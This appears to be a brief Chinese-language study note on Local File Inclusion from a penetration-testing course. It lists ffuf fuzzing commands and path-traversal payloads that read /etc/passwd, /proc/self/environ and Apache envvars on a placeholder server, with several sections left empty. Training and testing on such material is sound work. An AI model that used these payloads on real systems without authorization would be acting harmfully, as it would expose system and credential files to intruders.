LFI
1. 發現點
ffuf -w /opt/useful/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287
2. 測試Payload
ffuf -w /opt/useful/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287?page=/proc/self/environ #for dokcer
?page=../../../../etc/passwd?page=/proc/self/environcurl http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/apache2/envvars3. bypass技巧
4.濫用
6.Skills Assessment
最后更新于
这有帮助吗?